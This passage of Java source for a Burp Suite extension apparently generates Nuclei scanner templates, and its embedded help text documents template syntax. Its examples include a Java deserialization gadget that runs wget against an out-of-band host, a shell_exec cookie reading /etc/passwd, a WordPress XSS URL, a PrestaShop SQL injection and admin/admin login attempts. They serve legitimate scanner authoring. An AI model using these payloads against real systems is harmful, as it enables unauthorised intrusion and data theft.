SwingConstants.RIGHT); 111 | JTextField Nuc_tf_redirects_num = new JTextField(1); 112 | Nuc_tf_redirects_num.setText("2"); 113 | 114 | JLabel Nuc_lb_Match_word = new JLabel("matchers模版 ", SwingConstants.RIGHT); 115 | JCheckBox Nuc_CB_Match_word = new JCheckBox(" (word)"); 116 | Nuc_CB_Match_word.addActionListener(e -> { 117 | if (Nuc_CB_Match_word.isSelected()) { 118 | match_word = true; 119 | match_true = true; 120 | } else { 121 | match_word = false; 122 | } 123 | }); 124 | 125 | JLabel Nuc_lb_Match_header = new JLabel("matchers模版 ", SwingConstants.RIGHT); 126 | JCheckBox Nuc_CB_Match_header = new JCheckBox(" (header)"); 127 | Nuc_CB_Match_header.addActionListener(e -> { 128 | if (Nuc_CB_Match_header.isSelected()) { 129 | match_header = true; 130 | match_true = true; 131 | } else { 132 | match_header = false; 133 | } 134 | }); 135 | 136 | JLabel Nuc_lb_Match_status = new JLabel("matchers模版", SwingConstants.RIGHT); 137 | JCheckBox Nuc_CB_Match_status = new JCheckBox(" (status)"); 138 | Nuc_CB_Match_status.addActionListener(e -> { 139 | if (Nuc_CB_Match_status.isSelected()) { 140 | match_status = true; 141 | match_true = true; 142 | } else { 143 | match_status = false; 144 | } 145 | }); 146 | 147 | JLabel Nuc_lb_Match_extractors = new JLabel("matchers模版 ", SwingConstants.RIGHT); 148 | JCheckBox Nuc_CB_Match_extractors = new JCheckBox(" (extractors)"); 149 | Nuc_CB_Match_extractors.addActionListener(e -> { 150 | if (Nuc_CB_Match_extractors.isSelected()) { 151 | extractors = true; 152 | } else { 153 | extractors = false; 154 | } 155 | }); 156 | 157 | JLabel Nuc_lb_Match_negative = new JLabel("matchers模版 ", SwingConstants.RIGHT); 158 | JCheckBox Nuc_CB_Match_negative = new JCheckBox(" (negative)"); 159 | Nuc_CB_Match_negative.addActionListener(e -> { 160 | if (Nuc_CB_Match_negative.isSelected()) { 161 | match_negative = true; 162 | match_true = true; 163 | } else { 164 | match_negative = false; 165 | } 166 | }); 167 | 168 | JLabel Nuc_lb_Match_time = new JLabel("matchers模版 ", SwingConstants.RIGHT); 169 | JCheckBox Nuc_CB_Match_time = new JCheckBox(" (time)"); 170 | Nuc_CB_Match_time.addActionListener(e -> { 171 | if (Nuc_CB_Match_time.isSelected()) { 172 | match_time = true; 173 | match_true = true; 174 | } else { 175 | match_time = false; 176 | } 177 | }); 178 | 179 | JLabel Nuc_lb_Match_size = new JLabel("matchers模版 ", SwingConstants.RIGHT); 180 | JCheckBox Nuc_CB_Match_size = new JCheckBox(" (size)"); 181 | Nuc_CB_Match_size.addActionListener(e -> { 182 | if (Nuc_CB_Match_size.isSelected()) { 183 | match_size = true; 184 | match_true = true; 185 | } else { 186 | match_size = false; 187 | } 188 | }); 189 | 190 | JLabel Nuc_lb_Match_interactsh_protocol = new JLabel("matchers模版 ", SwingConstants.RIGHT); 191 | JCheckBox Nuc_CB_Match_interactsh_protocol = new JCheckBox(" (interactsh_protocol)"); 192 | Nuc_CB_Match_interactsh_protocol.addActionListener(e -> { 193 | if (Nuc_CB_Match_interactsh_protocol.isSelected()) { 194 | match_interactsh_protocol = true; 195 | match_true = true; 196 | } else { 197 | match_interactsh_protocol = false; 198 | } 199 | }); 200 | 201 | JLabel Nuc_lb_Match_interactsh_request = new JLabel("matchers模版 ", SwingConstants.RIGHT); 202 | JCheckBox Nuc_CB_Match_interactsh_request = new JCheckBox(" (interactsh_request)"); 203 | Nuc_CB_Match_interactsh_request.addActionListener(e -> { 204 | if (Nuc_CB_Match_interactsh_request.isSelected()) { 205 | match_interactsh_request = true; 206 | match_true = true; 207 | } else { 208 | match_interactsh_request = false; 209 | } 210 | }); 211 | 212 | JLabel Nuc_lb_Match_regex = new JLabel("matchers模版 ", SwingConstants.RIGHT); 213 | JCheckBox Nuc_CB_Match_regex = new JCheckBox(" (regex)"); 214 | Nuc_CB_Match_regex.addActionListener(e -> { 215 | if (Nuc_CB_Match_regex.isSelected()) { 216 | match_regex = true; 217 | match_true = true; 218 | } else { 219 | match_regex = false; 220 | } 221 | }); 222 | 223 | JLabel Nuc_lb_Match_binary = new JLabel("matchers模版 ", SwingConstants.RIGHT); 224 | JCheckBox Nuc_CB_Match_binary = new JCheckBox(" (binary)"); 225 | Nuc_CB_Match_binary.addActionListener(e -> { 226 | if (Nuc_CB_Match_binary.isSelected()) { 227 | match_binary = true; 228 | match_true = true; 229 | } else { 230 | match_binary = false; 231 | } 232 | }); 233 | 234 | Nuc_jp1.add(Nuc_bt_1); 235 | Nuc_jp1.add(Nuc_bt_2); 236 | Nuc_jp1.add(Nuc_lb_id); 237 | Nuc_jp1.add(Nuc_tf_id); 238 | Nuc_jp1.add(Nuc_lb_name); 239 | Nuc_jp1.add(Nuc_tf_name); 240 | Nuc_jp1.add(Nuc_lb_author); 241 | Nuc_jp1.add(Nuc_tf_author); 242 | Nuc_jp1.add(Nuc_lb_severity); 243 | Nuc_jp1.add(Nuc_Tab_severity); 244 | Nuc_jp1.add(Nuc_lb_description); 245 | Nuc_jp1.add(Nuc_tf_description); 246 | Nuc_jp1.add(Nuc_lb_tags); 247 | Nuc_jp1.add(Nuc_tf_tags); 248 | Nuc_jp1.add(Nuc_lb_req); 249 | Nuc_jp1.add(Nuc_Tab_req); 250 | Nuc_jp1.add(Nuc_lb_path); 251 | Nuc_jp1.add(Nuc_tf_path); 252 | Nuc_jp1.add(Nuc_lb_headers); 253 | Nuc_jp1.add(Nuc_Tab_headers); 254 | Nuc_jp1.add(Nuc_lb_body); 255 | Nuc_jp1.add(Nuc_Tab_body); 256 | Nuc_jp1.add(Nuc_lb_redirects); 257 | Nuc_jp1.add(Nuc_Tab_redirects); 258 | Nuc_jp1.add(Nuc_lb_redirects_num); 259 | Nuc_jp1.add(Nuc_tf_redirects_num); 260 | 261 | JPanel Nuc_jp4 = new JPanel(); 262 | Nuc_jp4.setLayout(new GridLayout(14, 2)); 263 | 264 | Nuc_jp4.add(Nuc_lb_Match_word); 265 | Nuc_jp4.add(Nuc_CB_Match_word); 266 | Nuc_jp4.add(Nuc_lb_Match_header); 267 | Nuc_jp4.add(Nuc_CB_Match_header); 268 | Nuc_jp4.add(Nuc_lb_Match_status); 269 | Nuc_jp4.add(Nuc_CB_Match_status); 270 | Nuc_jp4.add(Nuc_lb_Match_extractors); 271 | Nuc_jp4.add(Nuc_CB_Match_extractors); 272 | Nuc_jp4.add(Nuc_lb_Match_negative); 273 | Nuc_jp4.add(Nuc_CB_Match_negative); 274 | Nuc_jp4.add(Nuc_lb_Match_time); 275 | Nuc_jp4.add(Nuc_CB_Match_time); 276 | Nuc_jp4.add(Nuc_lb_Match_size); 277 | Nuc_jp4.add(Nuc_CB_Match_size); 278 | Nuc_jp4.add(Nuc_lb_Match_interactsh_protocol); 279 | Nuc_jp4.add(Nuc_CB_Match_interactsh_protocol); 280 | Nuc_jp4.add(Nuc_lb_Match_interactsh_request); 281 | Nuc_jp4.add(Nuc_CB_Match_interactsh_request); 282 | Nuc_jp4.add(Nuc_lb_Match_regex); 283 | Nuc_jp4.add(Nuc_CB_Match_regex); 284 | Nuc_jp4.add(Nuc_lb_Match_binary); 285 | Nuc_jp4.add(Nuc_CB_Match_binary); 286 | 287 | JPanel Nuc_jp2 = new JPanel(); 288 | Nuc_jp2.setLayout(new GridLayout(1, 1)); 289 | 290 | JTextArea Nuc_ta_2 = new JTextArea(); 291 | Nuc_ta_2.setText(""); 292 | Nuc_ta_2.setRows(30); 293 | Nuc_ta_2.setColumns(30); 294 | Nuc_ta_2.setLineWrap(true);//自动换行 295 | Nuc_ta_2.setEditable(true);//可编辑 296 | JScrollPane Nuc_sp_2 = new JScrollPane(Nuc_ta_2); 297 | 298 | Nuc_jp2.add(Nuc_sp_2); 299 | 300 | JPanel Nuc_jp3 = new JPanel(); 301 | Nuc_jp3.setLayout(new GridLayout(1, 1)); 302 | 303 | String Help_data1 = "官方文档:https://docs.projectdiscovery.io/templates/introduction\n" + 304 | "\n" + 305 | "nuclei 2.9.1 版本更新了模板格式。如果使用的是较旧的 nuclei 版本,可能无法解析新的模板格式。\n" + 306 | "建议将 nuclei 版本升级至 2.9.1 或更高版本以确保正确解析模板格式。\n" + 307 | "\n" + 308 | " ===========================示例模板===========================\n" + 309 | "id: template-id\n" + 310 | "\n" + 311 | "info:\n" + 312 | " name: Template Name\n" + 313 | " author: test\n" + 314 | " severity: info\n" + 315 | " description: 漏洞详情描述\n" + 316 | " reference:\n" + 317 | " - https://Template.nuclei.sh\n" + 318 | " # 元数据节点,与 uncover 集成的格式如下:-query: ''\n" + 319 | " metadata:\n" + 320 | " max-request: 2\n" + 321 | " fofa-query: 'body=\"公司\"'\n" + 322 | " shodan-query: 'vuln:CVE-2021-26855'\n" + 323 | " hunter-query: 'web.body=\"公司\"'\n" + 324 | " tags: tags\n" + 325 | "\n" + 326 | "# 自定义模版变量,自2.6.9版本开始支持\n" + 327 | "variables:\n" + 328 | " first_1: \"{{rand_int(8, 20)}}\"\n" + 329 | " first_2: \"{{rand_int(100, 101)}}\"\n" + 330 | "\n" + 331 | "http:\n" + 332 | " # 解析 raw 格式请求\n" + 333 | " - raw:\n" + 334 | " - |-\n" + 335 | " POST /{{Path}} HTTP/1.1\n" + 336 | " Host: {{Hostname}}\n" + 337 | " Content-Type: application/json\n" + 338 | " \n" + 339 | " {\"username\":{{username}},\"password\":{{password}}}\n" + 340 | "\n" + 341 | " attack: clusterbomb # 定义HTTP模糊攻击类型,可用类型: batteringram,pitchfork,clusterbomb\n" + 342 | " payloads:\n" + 343 | " username:\n" + 344 | " - 'admin'\n" + 345 | " password:\n" + 346 | " - 'admin'\n" + 347 | " # header: helpers/wordlists/header.txt\n" + 348 | " Path: \n" + 349 | " - 'api/selectContentManagePage'\n" + 350 | " \n" + 351 | " matchers-condition: and\n" + 352 | " matchers:\n" + 353 | " - type: dsl\n" + 354 | " dsl:\n" + 355 | " - \"contains(body, 'pageSize')\"\n" + 356 | " - \"contains(body_1, 'pageSize') && contains(body_2, 'pageNum')\"\n" + 357 | " - \"contains_all(body_1, 'pageSize', 'pageNum')\" #单个body包内指定多个匹配关键字\n" + 358 | " - \"contains(header, 'application/json')\"\n" + 359 | " - \"status_code == 200\"\n" + 360 | " - \"status_code_1 == 404 && status_code_2 == 200\"\n" + 361 | "\n" + 362 | " # 检查Cookie的MD5校验和是否包含在大写的请求体中\n" + 363 | " - \"contains(toupper(body), md5(cookie))\"\n" + 364 | " condition: and\n" + 365 | "\n" + 366 | " - type: dsl\n" + 367 | " dsl:\n" + 368 | " # 检测相应包的长度\n" + 369 | " - \"len(body_1) != 0\"\n" + 370 | " # 基于DSL的持续时间匹配器,当响应时间与定义的持续时间匹配时返回true,示例为大于等于6秒\n" + 371 | " - 'duration>=6'\n" + 372 | " condition: and\n" + 373 | "\n" + 374 | " # 匹配变量\n" + 375 | " - type: word\n" + 376 | " part: body\n" + 377 | " words:\n" + 378 | " - \"{{first_2}}\"\n" + 379 | "\n" + 380 | " # Interactsh匹配器,需要和使用 {{interactsh_response}}\n" + 381 | " # 可匹配 interactsh_protocol、interactsh_request和 interactsh_response 三处\n" + 382 | "\n" + 383 | " # 确认HTTP交互\n" + 384 | " - type: word\n" + 385 | " part: interactsh_protocol \n" + 386 | " words:\n" + 387 | " - \"http\"\n" + 388 | "\n" + 389 | " # 确认检索/etc/passwd文件\n" + 390 | " - type: regex\n" + 391 | " part: interactsh_request \n" + 392 | " regex:\n" + 393 | " - \"root:[x*]:0:0:\"\n" + 394 | "\n" + 395 | " # 确认DNS交互\n" + 396 | " - type: word\n" + 397 | " part: interactsh_response \n" + 398 | " words:\n" + 399 | " - \"dns\"\n" + 400 | "\n" + 401 | " # 二进制流匹配\n" + 402 | " - type: binary\n" + 403 | " binary:\n" + 404 | " - \"504B0304\" # zip archive\n" + 405 | " - \"526172211A070100\" # RAR archive version 5.0\n" + 406 | " - \"FD377A585A0000\" # xz tar.xz archive\n" + 407 | " condition: or # 指定单个匹配器内多个条件的与或关系\n" + 408 | " part: body\n" + 409 | "\n" + 410 | " - type: word\n" + 411 | " encoding: hex\n" + 412 | " words:\n" + 413 | " - \"50494e47\"\n" + 414 | " part: body\n" + 415 | "\n" + 416 | " # 否定匹配器,对匹配器结果进行取反\n" + 417 | " - type: word\n" + 418 | " words:\n" + 419 | " - \"PHPSESSID\"\n" + 420 | " part: header\n" + 421 | " negative: true\n" + 422 | "\n" + 423 | " extractors:\n" + 424 | " - type: regex\n" + 425 | " # 为提取的信息命名,方便调用,可省略\n" + 426 | " name: api\n" + 427 | " part: body\n" + 428 | " # 避免在终端中打印提取的值,使用动态变量时必须添加此标志\n" + 429 | " internal: true\n" + 430 | " regex:\n" + 431 | " - \"(?m)[0-9]{3,10}\\.[0-9]+\"\n" + 432 | "\n" + 433 | " ----------------------------分割线----------------------------\n" + 434 | "# 嵌套表达式\n" + 435 | "❌ {{url_decode({{base64_decode('SGVsbG8=')}})}}\n" + 436 | "✔ {{url_decode(base64_decode('SGVsbG8='))}}\n" + 437 | "\n" + 438 | "# 如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理\n" + 439 | "{{url_decode(base64_decode('{{test}}'))}}\n" + 440 | "\n" + 441 | " ----------------------------分割线----------------------------\n" + 442 | "# 自 Nuclei v2.3.6 发行以来,Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描\n" + 443 | "http:\n" + 444 | " - raw:\n" + 445 | " - |\n" + 446 | " GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1\n" + 447 | " Host: {{Hostname}}\n" + 448 | "\n" + 449 | " ----------------------------分割线----------------------------\n" + 450 | " # JAVA反序列化: https://docs.nuclei.sh/template-guide/helper-functions#deserialization-helper-functions\n" + 451 | "http:\n" + 452 | " - raw:\n" + 453 | " - |\n" + 454 | " POST /index.faces;jsessionid=x HTTP/1.1\n" + 455 | " Host: {{Hostname}}\n" + 456 | " Content-Type: application/x-www-form-urlencoded\n" + 457 | "\n" + 458 | " javax.faces.ViewState={{generate_java_gadget(\"commons-collections3.1\", \"wget http://{{interactsh-url}}\", \"base64\")}}\n" + 459 | "\n" + 460 | " ----------------------------分割线----------------------------\n" + 461 | " # 发送一个GET请求\n" + 462 | "http:\n" + 463 | " - method: GET\n" + 464 | " path:\n" + 465 | " - \"{{BaseURL}}/actuator/env\"\n" + 466 | " - \"{{BaseURL}}/login\"\n" + 467 | " - \"{{BaseURL}}/thumbs.db\"\n" + 468 | " - \"{{BaseURL}}/.svn/wc.db\"\n" + 469 | " # 发送一些头部信息给服务器的示例\n" + 470 | " headers:\n" + 471 | " X-Client-IP: 127.0.0.1\n" + 472 | " X-Remote-IP: 127.0.0.1\n" + 473 | " X-Remote-Addr: 127.0.0.1\n" + 474 | " X-Forwarded-For: 127.0.0.1\n" + 475 | " X-Originating-IP: 127.0.0.1\n" + 476 | " Cookie: \"CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl\"\n" + 477 | "\n" + 478 | " # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量\n" + 479 | " skip-variables-check: true\n" + 480 | "\n" + 481 | " # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板\n" + 482 | " stop-at-first-match: true\n" + 483 | "\n" + 484 | " # 单位 bytes- 从服务器响应中读取的最大值\n" + 485 | " max-size: 500\n" + 486 | "\n" + 487 | " ----------------------------分割线----------------------------\n" + 488 | "id: wp-related-post-xss\n" + 489 | "\n" + 490 | "http:\n" + 491 | " # 发送一个POST请求\n" + 492 | " - method: POST\n" + 493 | " path: \n" + 494 | " - '{{RootURL}}/wp-login.php'\n" + 495 | " headers:\n" + 496 | " Content-Type: application/x-www-form-urlencoded\n" + 497 | " body: 'log={{username}}&pwd={{password}}&wp-submit=Log+In'\n" + 498 | "\n" + 499 | " - method: GET\n" + 500 | " path:\n" + 501 | " - '{{RootURL}}/wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3Ep'\n" + 502 | "\n" + 503 | " # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。\n" + 504 | " cookie-reuse: true\n" + 505 | "\n" + 506 | " # 请求条件与匹配器中的DSL表达式一起使用。它们允许逻辑表达式包含跨多个请求/响应的条件。\n" + 507 | " # 在模板中添加 \"req-condition: true\" 选项。响应的属性可以使用 \"<请求编号>\" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2。\n" + 508 | " req-condition: true\n" + 509 | "\n" + 510 | " matchers-condition: and\n" + 511 | " matchers:\n" + 512 | " - type: dsl\n" + 513 | " dsl:\n" + 514 | " - \"contains(header, 'text/html')\"\n" + 515 | " - \"contains(body_1, '&action=edit') && contains(body_2, 'All Posts')\"\n" + 516 | " - \"status_code == 200\"\n" + 517 | " condition: and\n" + 518 | "\n" + 519 | " ----------------------------分割线----------------------------\n" + 520 | " # @timeout 请求注解\n" + 521 | "id: PrestaShop_Product_Comments_SQL_Injection_CVE-2020-26248\n" + 522 | "\n" + 523 | "http:\n" + 524 | " - raw:\n" + 525 | " - |\n" + 526 | " # @timeout 是请求注解的一种,⽤于覆盖默认的请求超时时间\n" + 527 | " @timeout: 20s\n" + 528 | " GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\n" + 529 | " Host: {{Hostname}}\n" + 530 | "\n" + 531 | " matchers:\n" + 532 | " - type: dsl\n" + 533 | " dsl:\n" + 534 | " - 'duration>=6 && status_code == 200'\n" + 535 | " - 'contains(content_type, \"application/json\") && contains(body, \"average_grade\")'\n" + 536 | " condition: and\n" + 537 | "\n" + 538 | " ----------------------------分割线----------------------------\n" + 539 | " # \"self-contained\"通常在批量检测API可用性时使用\n" + 540 | " # 假设你通过信息泄露获得了一个API密钥,但不知道这个密钥属于哪个服务,也没有其他特征可供参考。这时,你只能逐个尝试各个官方API接口,看哪个平台能够成功验证该密钥。\n" + 541 | "id: example-self-contained-input\n" + 542 | "\n" + 543 | "self-contained: true\n" + 544 | "http:\n" + 545 | " - raw:\n" + 546 | " - |\n" + 547 | " GET https://example.com:443/gg HTTP/1.1\n" + 548 | " Host: example.com:443\n"; 549 | 550 | 551 | JTextArea Nuc_ta_3 = new JTextArea(); 552 | Nuc_ta_3.setText(Help_data1); 553 | Nuc_ta_3.setRows(30); 554 | Nuc_ta_3.setColumns(30); 555 | Nuc_ta_3.setLineWrap(true);//自动换行 556 | Nuc_ta_3.setEditable(true);//可编辑 557 | JScrollPane Nuc_sp_3 = new JScrollPane(Nuc_ta_3); 558 | 559 | String Help_data2 = "官方文档:https://docs.projectdiscovery.io/templates/reference/helper-functions\n" + 560 | "\n" + 561 | " ----------------------------分割线----------------------------\n" + 562 | " # https://example.com:443/foo/bar.php\n" + 563 | "\n" + 564 | "{{BaseURL}} # https://example.com:443/foo/bar.php\n" + 565 | "{{RootURL}} # https://example.com:443\n" + 566 | "{{Hostname}} # example.com:443\n" + 567 | "{{Host}} # example.com\n" + 568 | "{{Port}} # 443\n" + 569 | "{{Path}} # /foo\n" + 570 | "{{File}} # bar.php\n" + 571 | "{{Scheme}} # https\n" + 572 | "\n" + 573 | " ----------------------------分割线----------------------------\n" + 574 | " # 重点配置参数备忘:\n" + 575 | "\n" + 576 | " # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量\n" + 577 | " skip-variables-check: true\n" + 578 | "\n" + 579 | " # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板\n" + 580 | " stop-at-first-match: true\n" + 581 | "\n" + 582 | " # 单位 bytes- 从服务器响应中读取的最大值\n" + 583 | " max-size: 500\n" + 584 | "\n" + 585 | " # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。\n" + 586 | " cookie-reuse: true\n" + 587 | "\n" + 588 | " # req-condition 与 DSL表达式匹配器一起使用,它允许逻辑表达式包含跨多个请求/响应的条件\n" + 589 | " # 在模板中添加 \"req-condition: true\" 选项,响应的属性可以使用 \"<请求编号>\" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2\n" + 590 | " req-condition: true\n" + 591 | "\n" + 592 | " redirects: true # 启用重定向\n" + 593 | " max- redirects: 3 # 允许重定向的次数,默认值为 10\n" + 594 | "\n" + 595 | " ----------------------------分割线----------------------------\n" + 596 | " # 模板签名:\n" + 597 | "\n" + 598 | " # 从v3.0.0开始支持签名,未签名的模板默认会被禁用\n" + 599 | " # 批量对模板进行签名\n" + 600 | " nuclei -lfa -duc -sign -t /home/nuclei-templates\n" + 601 | "\n" + 602 | " ----------------------------分割线----------------------------\n" + 603 | " # 返回输入的长度\n" + 604 | "\n" + 605 | "{{len(\"Hello\")}}\n" + 606 | "{{len(5555)}}\n" + 607 | "\n" + 608 | " ----------------------------分割线----------------------------\n" + 609 | " # 随机字段\n" + 610 | "\n" + 611 | "{{randstr}}\n" + 612 | "{{rand_int(10)}}\n" + 613 | "\n" + 614 | " ----------------------------分割线----------------------------\n" + 615 | " # 大小写转换\n" + 616 | "\n" + 617 | "{{to_lower(\"HELLO\")}} #将输入转换为小写字符\n" + 618 | "{{to_upper(\"hello\")}} #将输入转换为大写字符\n" + 619 | "\n" + 620 | " ----------------------------分割线----------------------------\n" + 621 | " # 编码转换\n" + 622 | "\n" + 623 | "{{url_decode(\"https:%2F%2Fprojectdiscovery.io%3Ftest=1\")}} #对输入字符串进行URL解码\n" + 624 | "{{url_encode(\"https://projectdiscovery.io/test?a=1\")}} #对输入字符串进行URL编码\n" + 625 | "\n" + 626 | "{{hex_decode(\"6161\")}}\n" + 627 | "{{hex_encode(\"aa\")}}\n" + 628 | "\n" + 629 | "{{sha1(\"Hello\")}}\n" + 630 | "{{sha256(\"Hello\")}}\n" + 631 | "\n" + 632 | "{{base64(\"Hello\")}}\n" + 633 | "{{base64(1234)}}\n" + 634 | "{{base64_decode(\"SGVsbG8=\")}}\n" + 635 | "{{base64_py(\"Hello\")}} #像Python一样将字符串编码为Base64(包含换行符)\n" + 636 | "\n" + 637 | "{{md5(\"Hello\")}}\n" + 638 | "{{md5(1234)}}\n" + 639 | "\n" + 640 | " ----------------------------分割线----------------------------\n" + 641 | "{{rand_base(5)}}\n" + 642 | "{{rand_base(5, \"abc\")}}\n" + 643 | "{{rand_char(\"abc\")}}\n" + 644 | "{{rand_char()}}\n" + 645 | "{{rand_int()}}\n" + 646 | "{{rand_int(1, 10)}}\n" + 647 | "{{rand_text_alpha(10)}}\n" + 648 | "{{rand_text_alpha(10, \"abc\")}}\n" + 649 | "{{rand_text_alphanumeric(10)}}\n" + 650 | "{{rand_text_alphanumeric(10, \"ab12\")}}\n" + 651 | "{{rand_text_numeric(10)}}\n" + 652 | "{{rand_text_numeric(10, 123)}}\n" + 653 | "\n" + 654 | " ----------------------------分割线----------------------------\n" + 655 | " # 验证字符串是否包含子字符串\n" + 656 | "{{contains(\"Hello\", \"lo\")}}\n" + 657 | "\n" + 658 | " ----------------------------分割线----------------------------\n" + 659 | " \n" + 660 | "{{generate_java_gadget(\"commons-collections3.1\", \"wget {{interactsh-url}}\", \"base64\")}}\n" + 661 | "{{gzip(\"Hello\")}}\n" + 662 | "{{html_escape(\"test\")}}\n" + 663 | "{{html_unescape(\"<body>test</body>\")}}\n" + 664 | "{{mmh3(\"Hello\")}}\n" + 665 | "{{print_debug(1+2, \"Hello\")}}\n" + 666 | "{{regex(\"H([a-z]+)o\", \"Hello\")}}\n" + 667 | "{{remove_bad_chars(\"abcd\", \"bc\")}}\n" + 668 | "{{repeat(\"../\", 5)}}\n" + 669 | "{{replace(\"Hello\", \"He\", \"Ha\")}}\n" + 670 | "{{replace_regex(\"He123llo\", \"(\\d+)\", \"\")}}\n" + 671 | "{{reverse(\"abc\")}}\n" + 672 | "{{trim(\"aaaHelloddd\", \"ad\")}}\n" + 673 | "{{trim_left(\"aaaHelloddd\", \"ad\")}}\n" + 674 | "{{trim_prefix(\"aaHelloaa\", \"aa\")}}\n" + 675 | "{{trim_right(\"aaaHelloddd\", \"ad\")}}\n" + 676 | "{{trim_space(\" Hello \")}}\n" + 677 | "{{trim_suffix(\"aaHelloaa\", \"aa\")}}\n" + 678 | "{{unix_time(10)}}\n" + 679 | "{{wait_for(1)}}\n" + 680 | "\n" + 681 | " ----------------------------分割线----------------------------\n" + 682 | " # www.projectdiscovery.io\n" + 683 | "\n" + 684 | "{{FQDN}} # www.projectdiscovery.io\n" + 685 | "{{RDN}} # projectdiscovery.io\n" + 686 | "{{DN}} # projectdiscovery\n" + 687 | "{{SD}} # www\n" + 688 | "{{TLD}} # io\n"; 689 | 690 | 691 | JTextArea Nuc_ta_4 = new JTextArea(); 692 | Nuc_ta_4.setText(Help_data2); 693 | Nuc_ta_4.setRows(30); 694 | Nuc_ta_4.setColumns(30); 695 | Nuc_ta_4.setLineWrap(true);//自动换行 696 | Nuc_ta_4.setEditable(true);//可编辑 697 | JScrollPane Nuc_sp_4 = new JScrollPane(Nuc_ta_4); 698 | 699 | Nuc_jp3.add(Nuc_sp_3); 700 | Nuc_jp3.add(Nuc_sp_4); 701 | 702 | //生成按钮 703 | Nuc_bt_1.addActionListener(new ActionListener() { 704 | @Override 705 | public void actionPerformed(ActionEvent e) { 706 | Nuc_ta_2.setText(Yaml_Gen(Nuc_tf_id.getText(), Nuc_tf_name.getText(), Nuc_tf_author.getText(), Nuc_tf_description.getText(), Nuc_tf_tags.getText(), Nuc_Tab_redirects.getSelectedItem().toString(), Nuc_tf_redirects_num.getText(), Nuc_Tab_req.getSelectedItem().toString(), Nuc_tf_path.getText(), Nuc_Tab_headers.getSelectedItem().toString(), Nuc_Tab_body.getSelectedItem().toString(), Nuc_Tab_severity.getSelectedItem().toString())); 707 | } 708 | }); 709 | //清空按钮 710 | Nuc_bt_2.addActionListener(new ActionListener() { 711 | @Override 712 | public void actionPerformed(ActionEvent e) { 713 | Nuc_ta_2.setText(""); 714 | } 715 | }); 716 | 717 | //主界面 718 | tabs = new JTabbedPane(); 719 | 720 | //tabs.addTab("Template生成",Nu_Te_Pane); 721 | // 信息生成界面 整体分布 722 | // Nu_Te_Pane.setLeftComponent(Nuc_jp1); 723 | // Nu_Te_Pane.setRightComponent(Nuc_jp2); 724 | // Nu_Te_Pane.setDividerLocation(400); 725 | 726 | JSplitPane Nu_Te_Pane2 = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 727 | tabs.addTab("Template生成", Nu_Te_Pane2); 728 | 729 | JSplitPane splitPanes = new JSplitPane(JSplitPane.VERTICAL_SPLIT); 730 | splitPanes.setTopComponent(Nuc_jp1); 731 | splitPanes.setBottomComponent(Nuc_jp4); 732 | splitPanes.setDividerLocation(450); 733 | 734 | JSplitPane splitPanes_2 = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 735 | splitPanes_2.setLeftComponent(Nuc_jp2); 736 | splitPanes_2.setRightComponent(Nuc_jp3); 737 | splitPanes_2.setDividerLocation(430); 738 | 739 | Nu_Te_Pane2.setLeftComponent(splitPanes); 740 | Nu_Te_Pane2.setRightComponent(splitPanes_2); 741 | Nu_Te_Pane2.setDividerLocation(380); 742 | 743 | // customize our UI components 744 | callbacks.customizeUiComponent(tabs); 745 | 746 | // add the custom tab to Burp's UI 747 | callbacks.addSuiteTab(BurpExtender.this); 748 | 749 | // register ourselves as an HTTP listener 750 | callbacks.registerHttpListener(BurpExtender.this); 751 | 752 | } 753 | 754 | private String[] GetReqModes() { 755 | ArrayList algStrs = new ArrayList(); 756 | Config.reqMode[] backends = Config.reqMode.values(); 757 | for (Config.reqMode backend : backends) { 758 | algStrs.add(backend.name().replace('_', '/')); 759 | } 760 | return algStrs.toArray(new String[algStrs.size()]); 761 | } 762 | 763 | private String[] GetSeverityModes() { 764 | ArrayList algStrs = new ArrayList(); 765 | Config.severityMode[] backends = Config.severityMode.values(); 766 | for (Config.severityMode backend : backends) { 767 | algStrs.add(backend.name().replace('_', '/')); 768 | } 769 | return algStrs.toArray(new String[algStrs.size()]); 770 | } 771 | 772 | private String[] GetBodyModes() { 773 | ArrayList algStrs = new ArrayList(); 774 | Config.ContentBodyMode[] backends = Config.ContentBodyMode.values(); 775 | for (Config.ContentBodyMode backend : backends) { 776 | algStrs.add(backend.name().replace('_', '/')); 777 | } 778 | return algStrs.toArray(new String[algStrs.size()]); 779 | } 780 | 781 | private String[] GetHeadersModes() { 782 | ArrayList algStrs = new ArrayList(); 783 | Config.ContentTypeMode[] backends = Config.ContentTypeMode.values(); 784 | for (Config.ContentTypeMode backend : backends) { 785 | algStrs.add(backend.name().replace('_', '/')); 786 | } 787 | return algStrs.toArray(new String[algStrs.size()]); 788 | } 789 | 790 | private String[] GetRedirectsModes() { 791 | ArrayList algStrs = new ArrayList(); 792 | Config.RedirectsMode[] backends = Config.RedirectsMode.values(); 793 | for (Config.RedirectsMode backend : backends) { 794 | algStrs.add(backend.name().replace('_', '/')); 795 | } 796 | return algStrs.toArray(new String[algStrs.size()]); 797 | } 798 | 799 | }); 800 | } 801 | 802 | 803 | @Override 804 | public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) { 805 | } 806 | 807 | @Override 808 | public String getTabCaption() { 809 | return "Nu_Te_Gen"; 810 | } 811 | 812 | @Override 813 | public Component getUiComponent() { 814 | return tabs; 815 | } 816 | 817 | private String 